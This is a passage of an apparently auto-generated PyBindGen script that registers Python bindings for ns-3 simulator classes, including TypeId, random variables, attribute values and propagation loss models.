## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector2DChecker [class]
module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector2DValue [class]
module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector3DChecker [class]
module.add_class('Vector3DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector3DValue [class]
module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
typehandlers.add_type_alias('ns3::Vector3DValue', 'ns3::VectorValue')
typehandlers.add_type_alias('ns3::Vector3DValue*', 'ns3::VectorValue*')
typehandlers.add_type_alias('ns3::Vector3DValue&', 'ns3::VectorValue&')
module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue')
typehandlers.add_type_alias('ns3::Vector3D', 'ns3::Vector')
typehandlers.add_type_alias('ns3::Vector3D*', 'ns3::Vector*')
typehandlers.add_type_alias('ns3::Vector3D&', 'ns3::Vector&')
module.add_typedef(root_module['ns3::Vector3D'], 'Vector')
typehandlers.add_type_alias('ns3::Vector3DChecker', 'ns3::VectorChecker')
typehandlers.add_type_alias('ns3::Vector3DChecker*', 'ns3::VectorChecker*')
typehandlers.add_type_alias('ns3::Vector3DChecker&', 'ns3::VectorChecker&')
module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3PropagationCache__Ns3JakesProcess_methods(root_module, root_module['ns3::PropagationCache< ns3::JakesProcess >'])
register_Ns3RandomVariable_methods(root_module, root_module['ns3::RandomVariable'])
register_Ns3SeedManager_methods(root_module, root_module['ns3::SeedManager'])
register_Ns3SequentialVariable_methods(root_module, root_module['ns3::SequentialVariable'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3TriangularVariable_methods(root_module, root_module['ns3::TriangularVariable'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3UniformVariable_methods(root_module, root_module['ns3::UniformVariable'])
register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D'])
register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D'])
register_Ns3WeibullVariable_methods(root_module, root_module['ns3::WeibullVariable'])
register_Ns3ZetaVariable_methods(root_module, root_module['ns3::ZetaVariable'])
register_Ns3ZipfVariable_methods(root_module, root_module['ns3::ZipfVariable'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3ConstantVariable_methods(root_module, root_module['ns3::ConstantVariable'])
register_Ns3DeterministicVariable_methods(root_module, root_module['ns3::DeterministicVariable'])
register_Ns3EmpiricalVariable_methods(root_module, root_module['ns3::EmpiricalVariable'])
register_Ns3ErlangVariable_methods(root_module, root_module['ns3::ErlangVariable'])
register_Ns3ExponentialVariable_methods(root_module, root_module['ns3::ExponentialVariable'])
register_Ns3GammaVariable_methods(root_module, root_module['ns3::GammaVariable'])
register_Ns3IntEmpiricalVariable_methods(root_module, root_module['ns3::IntEmpiricalVariable'])
register_Ns3LogNormalVariable_methods(root_module, root_module['ns3::LogNormalVariable'])
register_Ns3NormalVariable_methods(root_module, root_module['ns3::NormalVariable'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3ParetoVariable_methods(root_module, root_module['ns3::ParetoVariable'])
register_Ns3PropagationDelayModel_methods(root_module, root_module['ns3::PropagationDelayModel'])
register_Ns3PropagationLossModel_methods(root_module, root_module['ns3::PropagationLossModel'])
register_Ns3RandomPropagationDelayModel_methods(root_module, root_module['ns3::RandomPropagationDelayModel'])
register_Ns3RandomPropagationLossModel_methods(root_module, root_module['ns3::RandomPropagationLossModel'])
register_Ns3RangePropagationLossModel_methods(root_module, root_module['ns3::RangePropagationLossModel'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, root_module['ns3::ThreeLogDistancePropagationLossModel'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, root_module['ns3::TwoRayGroundPropagationLossModel'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3ConstantSpeedPropagationDelayModel_methods(root_module, root_module['ns3::ConstantSpeedPropagationDelayModel'])
register_Ns3Cost231PropagationLossModel_methods(root_module, root_module['ns3::Cost231PropagationLossModel'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3FixedRssLossModel_methods(root_module, root_module['ns3::FixedRssLossModel'])
register_Ns3FriisPropagationLossModel_methods(root_module, root_module['ns3::FriisPropagationLossModel'])
register_Ns3ItuR1411LosPropagationLossModel_methods(root_module, root_module['ns3::ItuR1411LosPropagationLossModel'])
register_Ns3ItuR1411NlosOverRooftopPropagationLossModel_methods(root_module, root_module['ns3::ItuR1411NlosOverRooftopPropagationLossModel'])
register_Ns3JakesProcess_methods(root_module, root_module['ns3::JakesProcess'])
register_Ns3JakesPropagationLossModel_methods(root_module, root_module['ns3::JakesPropagationLossModel'])
register_Ns3Kun2600MhzPropagationLossModel_methods(root_module, root_module['ns3::Kun2600MhzPropagationLossModel'])
register_Ns3LogDistancePropagationLossModel_methods(root_module, root_module['ns3::LogDistancePropagationLossModel'])
register_Ns3MatrixPropagationLossModel_methods(root_module, root_module['ns3::MatrixPropagationLossModel'])
register_Ns3MobilityModel_methods(root_module, root_module['ns3::MobilityModel'])
register_Ns3NakagamiPropagationLossModel_methods(root_module, root_module['ns3::NakagamiPropagationLossModel'])
register_Ns3OkumuraHataPropagationLossModel_methods(root_module, root_module['ns3::OkumuraHataPropagationLossModel'])
register_Ns3RandomVariableChecker_methods(root_module, root_module['ns3::RandomVariableChecker'])
register_Ns3RandomVariableValue_methods(root_module, root_module['ns3::RandomVariableValue'])
register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker'])
register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue'])
register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker'])
register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue'])
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3PropagationCache__Ns3JakesProcess_methods(root_module, cls):
## propagation-cache.h (module 'propagation'): ns3::PropagationCache<ns3::JakesProcess>::PropagationCache(ns3::PropagationCache<ns3::JakesProcess> const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PropagationCache< ns3::JakesProcess > const &', 'arg0')])
## propagation-cache.h (module 'propagation'): ns3::PropagationCache<ns3::JakesProcess>::PropagationCache() [constructor]
cls.add_constructor([])
## propagation-cache.h (module 'propagation'): ns3::Ptr<ns3::JakesProcess> ns3::PropagationCache<ns3::JakesProcess>::GetPathData(ns3::Ptr<ns3::MobilityModel const> a, ns3::Ptr<ns3::MobilityModel const> b, uint32_t modelUid) [member function]
cls.add_method('GetPathData',
'ns3::Ptr< ns3::JakesProcess >',
[param('ns3::Ptr< ns3::MobilityModel const >', 'a'), param('ns3::Ptr< ns3::MobilityModel const >', 'b'), param('uint32_t', 'modelUid')])
return
def register_Ns3RandomVariable_methods(root_module, cls):
cls.add_output_stream_operator()
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable(ns3::RandomVariable const & o) [copy constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'o')])
## random-variable.h (module 'core'): uint32_t ns3::RandomVariable::GetInteger() const [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::RandomVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
return
def register_Ns3SeedManager_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::SeedManager::SeedManager() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::SeedManager::SeedManager(ns3::SeedManager const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SeedManager const &', 'arg0')])
## random-variable.h (module 'core'): static bool ns3::SeedManager::CheckSeed(uint32_t seed) [member function]
cls.add_method('CheckSeed',
'bool',
[param('uint32_t', 'seed')],
is_static=True)
## random-variable.h (module 'core'): static uint32_t ns3::SeedManager::GetRun() [member function]
cls.add_method('GetRun',
'uint32_t',
[],
is_static=True)
## random-variable.h (module 'core'): static uint32_t ns3::SeedManager::GetSeed() [member function]
cls.add_method('GetSeed',
'uint32_t',
[],
is_static=True)
## random-variable.h (module 'core'): static void ns3::SeedManager::SetRun(uint32_t run) [member function]
cls.add_method('SetRun',
'void',
[param('uint32_t', 'run')],
is_static=True)
## random-variable.h (module 'core'): static void ns3::SeedManager::SetSeed(uint32_t seed) [member function]
cls.add_method('SetSeed',
'void',
[param('uint32_t', 'seed')],
is_static=True)
return
def register_Ns3SequentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(ns3::SequentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SequentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, double i=1, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('double', 'i', default_value='1'), param('uint32_t', 'c', default_value='1')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, ns3::RandomVariable const & i, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('ns3::RandomVariable const &', 'i'), param('uint32_t', 'c', default_value='1')])
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TriangularVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(ns3::TriangularVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TriangularVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(double s, double l, double mean) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l'), param('double', 'mean')])
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
